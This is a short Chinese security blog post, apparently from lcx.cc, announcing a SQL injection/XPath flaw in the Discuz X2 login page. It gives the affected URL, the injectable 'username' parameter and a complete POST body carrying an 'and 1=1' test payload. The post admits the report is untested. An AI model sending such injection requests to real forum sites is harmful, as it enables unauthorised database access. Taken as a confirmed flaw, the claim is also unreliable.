Discuz X2 SQL注入/Xpath 最新漏洞

  • A+
所属分类:lcx

漏洞类型:SQL注入/Xpath

请求方式:POST

影响页面:http://127.0.0.1/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes

提交参数:username

参数测试:and 1=1

攻击细节:username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield

漏洞来源:网络,真实性未测……

文章来源于lcx.cc:Discuz X2 SQL注入/Xpath 最新漏洞

相关推荐: 【重大新闻】非法牟利7000万狂购名车豪宅 骑士攻击小组栽了

图为高某的座驾宾利 蔡文的座驾A8L,他正是驾驶这辆车逃往安徽 高某的另一辆豪车,白色玛莎拉蒂 他们是一群活跃在网上的85后,大多只有高中文化,却出入高档会所,拥有玛莎拉蒂、宾利等豪车,一掷千金购写字楼、别墅,他们是一群网络非法“骑士”,业内人称 “骑士攻击小…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: